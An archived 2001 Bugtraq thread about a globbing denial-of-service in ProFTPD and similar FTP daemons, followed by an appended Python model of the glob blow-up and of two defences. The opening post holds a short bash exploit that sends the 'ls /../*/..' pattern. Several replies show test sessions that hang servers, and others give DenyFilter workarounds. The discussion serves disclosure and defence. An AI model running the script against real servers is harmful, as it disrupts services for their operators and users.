6941350 2001-08-20 15:20 +0200  /55 lines/ Enrico Kern <IphantomI@web.de>
Sent by: joel@lysator.liu.se
Imported: 2001-08-20 19:52 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <18853>
Subject: Multiple-Vendor-FTP-Vuln. (old?)
------------------------------------------------------------
From: "Enrico Kern" <IphantomI@web.de>
To: bugtraq@securityfocus.com
Message-ID: <200108201320.f7KDKZK26818@mailgate4.cinetic.de>

Hi,

I tested an old proftpd bug (ls /../*/../*/../*/../*/../*/../*/../*) on
many new Linux-Dist.. When a user logs in to ftp and types the ls command,
the in.ftpd takes over 90 percent cpu-usage; execute the command 2 or 3x
and then the full system hangs up. It also works in console. I wonder that
it is not fixed. THIS BUG IS OLD. POSTED ON BUGTRAQ in March 01, but it
still works so I post it again.

affected:

RedHat Linux 7.x
Linux Mandrake 8.0
SuSE Linux 7.2
FreeBSD 4.3
AiX V 4.3
other?

Not vuln.:

latest Wu-Ftpd
Windows FTP-Server

Exploit:

#!/bin/bash
ftp -n FTP-SERVER<<\end
quot user anonymous
bin
quot pass shitold@bug.com
ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
bye
end

Fix:

set cpu-limit for your anonymous user.
-------------------------
Enrico Kern
www.h07.org
(6941350) /Enrico Kern <IphantomI@web.de>/----------
Comment in text 6942692 by skip <skip@fif3.com>
Comment in text 6943064 by Scott Dier <dieman@ringworld.org>
Comment in text 6943159 by Mike Jakubik <mikej@trigger.net>
Comment in text 6943274 by Bernhard Rosenkraenzer <bero@redhat.de>
Comment in text 6943282 by Roman Drahtmueller <draht@suse.de>

6942692 2001-08-20 13:35 -0700  /18 lines/ skip <skip@fif3.com>
Sent by: joel@lysator.liu.se
Imported: 2001-08-20 23:22 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <18859>
Comment to text 6941350 by Enrico Kern <IphantomI@web.de>
Subject: Re: Multiple-Vendor-FTP-Vuln. (old?)
------------------------------------------------------------
I just tested on Slackware 8 running ProFTPD Version 1.2.1 and no bug...
or at least I received the directory listings and no great CPU load was
seen nor did my system hang. Tested via localhost and a remote host.

----
- skip
----
- p.s. we sincerely apologize to all platypus enthusiasts out
- there who are offended by that thoughtless comment about
- the platypi. we love the noble platypus, and it is not our
- intention to slight these stupid creatures in any way.
----
(6942692) /skip <skip@fif3.com>/--------------------
Attachment (application/x-pkcs7-signature) in text 6942693
Comment in text 6943150 by jeev <geonap@pacbell.net>

6942693 2001-08-20 13:35 -0700  /13 lines/ skip <skip@fif3.com>
Attachment filename: "smime.p7s"
Imported: 2001-08-20 23:22 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <18860>
Attachment (text/plain) to text 6942692
Subject: Attachment (smime.p7s) to: Re: Multiple-Vendor-FTP-Vuln. (old?)
(6942693) /skip <skip@fif3.com>/----------(Reflowed)

6943150 2001-08-20 14:29 -0700  /39 lines/ jeev <geonap@pacbell.net>
Sent by: joel@lysator.liu.se
Imported: 2001-08-21 01:41 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <18867>
Comment to text 6942692 by skip <skip@fif3.com>
Subject: RE: Multiple-Vendor-FTP-Vuln. (old?)
------------------------------------------------------------
From: jeev <geonap@pacbell.net>
To: bugtraq@securityfocus.com
Message-ID: <000501c129bf$32cf18d0$0100a8c0@jeev>

Tested on slack 8 with 1.2.2rc3 no problem, and with 1.2.2 no problem:

ftp> ls /../*/../*/../*/../*/../*/../*/../*
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
226-Out of memory during globbing of /../*/../*/../*/../*/../*/../*/../*
226 Transfer complete.
ftp>

j

-----Original Message-----
From: skip [mailto:skip@fif3.com]
Sent: Monday, August 20, 2001 1:36 PM
To: bugtraq@securityfocus.com
Subject: Re: Multiple-Vendor-FTP-Vuln. (old?)

I just tested on Slackware 8 running ProFTPD Version 1.2.1 and no bug...
or at least I received the directory listings and no great CPU load was
seen nor did my system hang. Tested via localhost and a remote host.

----
- skip
----
- p.s. we sincerely apologize to all platypus enthusiasts out
- there who are offended by that thoughtless comment about
- the platypi. we love the noble platypus, and it is not our
- intention to slight these stupid creatures in any way.
----
(6943150) /jeev <geonap@pacbell.net>/---------------

6943064 2001-08-20 15:35 -0500  /21 lines/ Scott Dier <dieman@ringworld.org>
Sent by: joel@lysator.liu.se
Imported: 2001-08-21 01:10 by Brevbäraren
External recipient: Enrico Kern <IphantomI@web.de>
External CC recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <18866>
Comment to text 6941350 by Enrico Kern <IphantomI@web.de>
Subject: Re: Multiple-Vendor-FTP-Vuln. (old?)
------------------------------------------------------------
From: Scott Dier <dieman@ringworld.org>
To: Enrico Kern <IphantomI@web.de>
Cc: bugtraq@securityfocus.com
Message-ID: <20010820153506.M9092@ringworld.org>

* Enrico Kern <IphantomI@web.de> [010820 12:31]:
> Hi,
>
> i tested an old proftpd bug (ls /../*/../*/../*/../*/../*/../*/../*) on

http://www.proftpd.org/critbugs.html

Add "DenyFilter \*.*/" to your config.

No software patch beats actual systems administration.

--
Scott Dier <dieman@ringworld.org> <sdier@debian.org>
http://www.ringworld.org/ #linuxos@irc.openprojects.net
(6943064) /Scott Dier <dieman@ringworld.org>/-------

6943159 2001-08-20 15:14 -0400  /28 lines/ Mike Jakubik <mikej@trigger.net>
Sent by: joel@lysator.liu.se
Imported: 2001-08-21 01:47 by Brevbäraren
External recipient: Enrico Kern <IphantomI@web.de>
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <18868>
Comment to text 6941350 by Enrico Kern <IphantomI@web.de>
Subject: RE: Multiple-Vendor-FTP-Vuln. (old?)
------------------------------------------------------------
From: "Mike Jakubik" <mikej@trigger.net>
To: "Enrico Kern" <IphantomI@web.de>, <bugtraq@securityfocus.com>
Message-ID: <FMELKCEINAGGPLLNMKEOGEACCNAA.mikej@trigger.net>

> Hi,
>
> i tested an old proftpd bug (ls /../*/../*/../*/../*/../*/../*/../*) on
> many new Linux-Dist.. When a user logged in in ftp and type
> the ls command the in.ftpd takes over 90 percent cpu-usage and execute
> the command 2 or 3x than the full system hang up. it also works in
> console. I wonder that is not fixed. THIS BUG IS OLD. POSTED ON BUGTRAQ
> in march 01, but
> it still works so i post it again.
>
> affected:
>
> RedHat Linux 7.x
> Linux Mandrake 8.0
> SuSE Linux 7.2
> FreeBSD 4.3
> AiX V 4.3
> other?

FreeBSD 4.3 is NOT affected by this, your system code may be out of sync.
Yes, this is an old globbing bug, almost all ftp daemons have been updated
by now.
Distributions before the bug's announced day will of course be affected.
(6943159) /Mike Jakubik <mikej@trigger.net>/(Reflowed)

6943274 2001-08-20 19:36 +0200  /21 lines/ Bernhard Rosenkraenzer <bero@redhat.de>
Sent by: joel@lysator.liu.se
Imported: 2001-08-21 02:44 by Brevbäraren
External recipient: Enrico Kern <IphantomI@web.de>
External CC recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <18871>
Comment to text 6941350 by Enrico Kern <IphantomI@web.de>
Subject: Re: Multiple-Vendor-FTP-Vuln. (old?)
------------------------------------------------------------
From: Bernhard Rosenkraenzer <bero@redhat.de>
To: Enrico Kern <IphantomI@web.de>
Cc: <bugtraq@securityfocus.com>
Message-ID: <Pine.LNX.4.33.0108201935480.32746-100000@bochum.stuttgart.redhat.com>

On Mon, 20 Aug 2001, Enrico Kern wrote:

> i tested an old proftpd bug (ls /../*/../*/../*/../*/../*/../*/../*) on
> many new Linux-Dist..
>
> affected:
>
> RedHat Linux 7.x

We don't ship proftpd (and never did).

LLaP
bero
(6943274) /Bernhard Rosenkraenzer <bero@redhat.de>/-

6943282 2001-08-21 01:40 +0200  /55 lines/ Roman Drahtmueller <draht@suse.de>
Sent by: joel@lysator.liu.se
Imported: 2001-08-21 02:50 by Brevbäraren
External recipient: bugtraq@securityfocus.com
External CC recipient: security@suse.de
Recipient: Bugtraq (import) <18872>
Comment to text 6941350 by Enrico Kern <IphantomI@web.de>
Subject: Re: Multiple-Vendor-FTP-Vuln. (old?)
------------------------------------------------------------
From: Roman Drahtmueller <draht@suse.de>
To: <bugtraq@securityfocus.com>
Cc: <security@suse.de>
Message-ID: <Pine.LNX.4.33.0108210132220.9532-100000@dent.suse.de>

>
> i tested an old proftpd bug (ls /../*/../*/../*/../*/../*/../*/../*) on
> many new Linux-Dist.. When a user logged in in ftp and type
> the ls command the in.ftpd takes over 90 percent cpu-usage and execute
> the command 2 or 3x than the full system hang up. it also works in
> console. I wonder that is not fixed. THIS BUG IS OLD.
> POSTED ON BUGTRAQ
> in march 01, but
> it still works so i post it again.
>
> affected:
>
> RedHat Linux 7.x
> Linux Mandrake 8.0
> SuSE Linux 7.2

I wonder when or where you tested this. The proftpd package that can be
found in the /pub/suse/<arch>/update/*/n1/ directories on ftp.suse.com
(age: May 9th) does not show this behaviour and appears to be sane.

[...]

> Fix:
>
> set cpu-limit for your anonymous user.

I doubt that this solution is very efficient if you provide automatic gzip
(and maybe tar) service so that your users can get a directory recursively
in form of a tarfile by using the command
    get directory_name.tar.gz
You'd have to choose...

Also recommended:
    DenyFilter "%"
if there are more format string errors in the code, this might be an easy
workaround until the code is fixed in the right place.

Roman.
--
 -                                                                      -
| Roman Drahtmüller      <draht@suse.de> //          "Caution: Cape does |
  SuSE GmbH - Security           Phone: //       not enable user to fly."
| Nürnberg, Germany     +49-911-740530 // (Batman Costume warning label) |
 -                                                                      -
(6943282) /Roman Drahtmueller <draht@suse.de>/(Reflowed)

6942124 2001-08-20 19:20 +0000  /19 lines/ Michael Faurot <mfaurot@atww.org>
Sent by: joel@lysator.liu.se
Imported: 2001-08-20 22:03 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <18858>
Subject: Re: Multiple-Vendor-FTP-Vuln. (old?)
------------------------------------------------------------
From: "Michael Faurot" <mfaurot@atww.org>
To: bugtraq@securityfocus.com
Message-ID: <9lrnt0$k0p$1@phzzzt.atww.org>

Enrico Kern <IphantomI@web.de> wrote:
: Hi,

: i tested an old proftpd bug (ls /../*/../*/../*/../*/../*/../*/../*) on
: many new Linux-Dist..

This bug appears to still be present with Debian Stable (Potato) which
uses ProFTPd v1.2.0pre10.

--
------------------------------------------------------------------------------
Michael | mfaurot  | Give your child mental blocks for Christmas.
Faurot  | atww.org |
(6942124) /Michael Faurot <mfaurot@atww.org>/-------
Comment in text 6943051 by Robert van der Meulen <rvdm@debian.org>

6943051 2001-08-21 00:12 +0200  /25 lines/ Robert van der Meulen <rvdm@debian.org>
Sent by: joel@lysator.liu.se
Imported: 2001-08-21 01:06 by Brevbäraren
External recipient: Michael Faurot <mfaurot@atww.org>
External CC recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <18864>
Comment to text 6942124 by Michael Faurot <mfaurot@atww.org>
Subject: Re: Multiple-Vendor-FTP-Vuln. (old?)
------------------------------------------------------------
From: Robert van der Meulen <rvdm@debian.org>
To: Michael Faurot <mfaurot@atww.org>
Cc: bugtraq@securityfocus.com
Message-ID: <20010821001246.A9136@wiretrip.org>

Hi,

Quoting Michael Faurot (mfaurot@atww.org):
> : i tested an old proftpd bug (ls /../*/../*/../*/../*/../*/../*/../*) on
> : many new Linux-Dist..
> This bug appears to still be present with Debian Stable (Potato) which
> uses ProFTPd v1.2.0pre10.

Are you sure? What exact version are you testing with?
I tested this with a couple of Debian stable machines, all running with the
latest security updates (i.e. proftpd 1.2.0pre10-2.0potato1), and couldn't
reproduce it.

Greets,
Robert

--
Linux Generation
encrypted mail preferred. finger rvdm@debian.org for my GnuPG/PGP key.
<doogie> 'How to Raise Your I.Q. by Eating Gifted Children'
(6943051) /Robert van der Meulen <rvdm@debian.org>/-

6943262 2001-08-21 01:41 +0200  /55 lines/ E. van Elk <evelk@dsv.nl>
Sent by: joel@lysator.liu.se
Imported: 2001-08-21 02:38 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <18870>
Subject: RE: Multiple-Vendor-FTP-Vuln. (old?)
------------------------------------------------------------
From: "E. van Elk" <evelk@dsv.nl>
To: bugtraq@securityfocus.com
Message-ID: <5.1.0.14.2.20010821012930.02edfd50@pop.eve-software.com>

At 00:43 21-8-2001, you wrote:
>Couldn't reproduce on Debian 2.2....
>
>isp-server-03:/# proftpd -v
> - ProFTPD Version 1.2.0pre10

I tested it on my Debian 2.2 machine and:

:/# proftpd -v
 - ProFTPD Version 1.2.0pre10

Verbonden met .
220 ProFTPD 1.2.0pre10 Server (Debian) []
Gebruiker ( :(none)):
331 Password required for .
Wachtwoord:
230 User logged in.
ftp> ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
200 PORT command successful.
550 No files found.
ftp> ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
200 PORT command successful.
Verbinding verbroken door externe host.
ftp>

CPU goes to 99.1 % and after the second attempt the connection to the
server is broken..

Debian 2.2 ftpd 0.11-8potato.1 is vulnerable too:

Verbonden met .
220 FTP server (Version 6.2/OpenBSD/Linux-0.10) ready.
Gebruiker ( :(none)):
331 Password required for .
Wachtwoord:
230- Linux 2.2.19pre17 #1 Tue Mar 13 22:37:59 EST 2001 i686 unknown
230-
230 User logged in.
ftp> ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
200 PORT command successful.
550 not found
ftp> ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
200 PORT command successful.
Verbinding verbroken door externe host.
ftp>

CPU goes to 99.1 % and after the second attempt the connection to the
server is broken..
(6943262) /E. van Elk <evelk@dsv.nl>/---------------

6943327 2001-08-21 08:43 +1000  /50 lines/ Michael Bellears <michael.bellears@staff.datafx.com.au>
Sent by: joel@lysator.liu.se
Imported: 2001-08-21 03:19 by Brevbäraren
External recipient: 'Michael Faurot' <mfaurot@atww.org>
External CC recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <18875>
Subject: RE: Multiple-Vendor-FTP-Vuln. (old?)
------------------------------------------------------------
From: Michael Bellears <michael.bellears@staff.datafx.com.au>
To: 'Michael Faurot' <mfaurot@atww.org>
Cc: bugtraq@securityfocus.com
Message-ID: <C01D5C25A363D411A99200902760F2712C2A94@thematrix.datafx.com.au>

Couldn't reproduce on Debian 2.2....
isp-server-03:/# proftpd -v
 - ProFTPD Version 1.2.0pre10

Remote system type is UNIX.
Using binary mode to transfer files.
ftp> bin
200 Type set to I.
ftp> ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
200 PORT command successful.
550 /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*: Forbidden command argument
ftp> quit
221 Goodbye.

Regards,
MB

> -----Original Message-----
> From: Michael Faurot [mailto:mfaurot@atww.org]
> Sent: Tuesday, 21 August 2001 5:20 AM
> To: bugtraq@securityfocus.com
> Subject: Re: Multiple-Vendor-FTP-Vuln. (old?)
>
>
> Enrico Kern <IphantomI@web.de> wrote:
> : Hi,
>
> : i tested an old proftpd bug (ls
> /../*/../*/../*/../*/../*/../*/../*) on
> : many new Linux-Dist..
>
> This bug appears to still be present with Debian Stable (Potato) which
> uses ProFTPd v1.2.0pre10.
>
> --
> --------------------------------------------------------------
> ----------------
> Michael | mfaurot  | Give your child mental blocks for Christmas.
> Faurot  | atww.org |
>
(6943327) /Michael Bellears <michael.bellears@staff.datafx.com.au>/

6943621 2001-08-21 03:54 +0000  /76 lines/ Michael Faurot <mfaurot@atww.org>
Sent by: joel@lysator.liu.se
Imported: 2001-08-21 06:26 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <18879>
Subject: Re: Multiple-Vendor-FTP-Vuln. (old?)
------------------------------------------------------------
From: "Michael Faurot" <mfaurot@atww.org>
To: bugtraq@securityfocus.com
Message-ID: <9lsm23$2g9$1@phzzzt.atww.org>

Michael Bellears <michael.bellears@staff.datafx.com.au> wrote:
: Couldn't reproduce on Debian 2.2....

: isp-server-03:/# proftpd -v
:  - ProFTPD Version 1.2.0pre10

Debian 2.2 and the same version of ProftpD here.
According to dpkg:

    dpkg -s proftpd | grep ^Version
    Version: 1.2.0pre10-2.0potato1

The client side of the ftp session, that initiates the problem:

------------------------------------------------------------------------------
Script started on Mon Aug 20 18:15:49 2001
$ ftp ftp.mydomain.com
Connected to web.mydomain.com.
220 ProFTPD 1.2.0pre10 Server (mydomain.com FTP) [web.mydomain.com]
Name (ftp.mydomain.com:mfaurot):
331 Password required for mfaurot.
Password:
230 User mfaurot logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
Quit
$ exit

Script done on Mon Aug 20 18:18:22 2001
------------------------------------------------------------------------------

After issuing the "ls" command the server seems to freeze after displaying
"150 Opening ASCII mode data connection for file list." It then becomes
necessary to issue a Ctrl-\ to exit the ftp client.
Now, on the server hosting Proftpd, here's the relevant bit from "top"
showing the proftpd process sucking all the available CPU and a lot of
the RAM:

------------------------------------------------------------------------------
  6:18pm  up 5 days,  3:02,  2 users,  load average: 0.28, 0.06, 0.02
45 processes: 42 sleeping, 3 running, 0 zombie, 0 stopped
CPU states:  0.6% user,  0.1% system,  0.2% nice,  1.9% idle
Mem:   255984K av,  184876K used,   71108K free,       0K shrd,    2464K buff
Swap:  248968K av,   26260K used,  222708K free                   19400K cached

  PID USER     PRI  NI  SIZE  RSS SHARE STAT  LIB %CPU %MEM   TIME COMMAND
27556 mfaurot   20   0 76884  75M   952 R       0 96.4 30.0   0:21 proftpd
27561 mfaurot   12   0  1476 1476   740 R       0  2.8  0.5   0:00 top
    1 root       8   0   132   84    60 S       0  0.0  0.0   0:03 init
    2 root       9   0     0    0     0 SW      0  0.0  0.0   0:00 keventd
------------------------------------------------------------------------------

NOTE: The configuration option "DenyFilter \*.*/" has not been applied to
this system. While that might well resolve the issue for me, that's not
going to fix the problem for the next person that is unaware of the bug.

In discussing this situation with Robert van der Meulen, I note that this
only happens when one logs in with a regular user id and password, but
it doesn't happen when doing an anonymous login.

--
------------------------------------------------------------------------------
Michael | mfaurot  | We're all just basically monkeys with car keys.
Faurot  | atww.org |
(6943621) /Michael Faurot <mfaurot@atww.org>/-------
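
Added example (not part of the thread and not code from any FTP daemon): a Python model of why each extra "/../*" in the argument multiplies the server's globbing work, and of the two server-side outcomes reported above, the DenyFilter refusal and the bounded glob. The in-memory directory tree, the function names and the max_paths budget are assumptions made for illustration; the two refusal texts copy the replies quoted in the thread.

```python
import fnmatch
import re


class GlobBudgetExceeded(Exception):
    """Raised when expansion produces more candidate paths than allowed."""


def make_tree(width):
    # Constructed filesystem: a root holding `width` empty directories.
    return {f"d{i}": {} for i in range(width)}


def star_pattern(stars):
    # Same shape as the argument in the thread: "/../*" repeated.
    return "/../*" * stars


def expand(pattern, root, max_paths=None):
    """Expand a glob one path component at a time against the in-memory tree.

    Each candidate is (path_string, stack_of_directory_nodes). A '..' after
    a '*' sends every candidate back to its parent, so the next '*'
    multiplies the candidate count by the directory width again.
    """
    candidates = [("", [root])]
    for part in (p for p in pattern.split("/") if p):
        nxt = []
        for path, stack in candidates:
            if part == "..":
                # '..' at the root stays at the root.
                nxt.append((path + "/..", stack[:-1] or stack))
                continue
            for name in sorted(stack[-1]):
                if fnmatch.fnmatchcase(name, part):
                    nxt.append((f"{path}/{name}", stack + [stack[-1][name]]))
                    if max_paths is not None and len(nxt) > max_paths:
                        raise GlobBudgetExceeded(pattern)
        candidates = nxt
    return [path for path, _ in candidates]


# DenyFilter \*.*/ is the workaround quoted in the thread.
# Assumption: the server applies it as an unanchored regex to the argument.
DENY_FILTER = re.compile(r"\*.*/")


def list_reply(arg, root, deny_filter=None, max_paths=None):
    """Model of a LIST handler with the filter and/or the glob budget enabled."""
    if deny_filter is not None and deny_filter.search(arg):
        return f"550 {arg}: Forbidden command argument"
    try:
        count = len(expand(arg, root, max_paths))
    except GlobBudgetExceeded:
        return f"226-Out of memory during globbing of {arg}"
    # The entry count in this reply is a constructed detail.
    return f"226 Transfer complete ({count} entries)"


if __name__ == "__main__":
    tree = make_tree(4)
    for k in (1, 3, 7):
        print(k, "stars ->", len(expand(star_pattern(k), tree)), "paths")
    print(list_reply(star_pattern(12), tree, max_paths=10_000))
    print(list_reply(star_pattern(12), tree, deny_filter=DENY_FILTER))
    print(list_reply("*.txt", tree, deny_filter=DENY_FILTER))
```

With only four directories at the root the seven-star argument already expands to 4^7 paths. Note that the filter also refuses harmless arguments such as pub/*/README, since any "*" followed later by "/" matches.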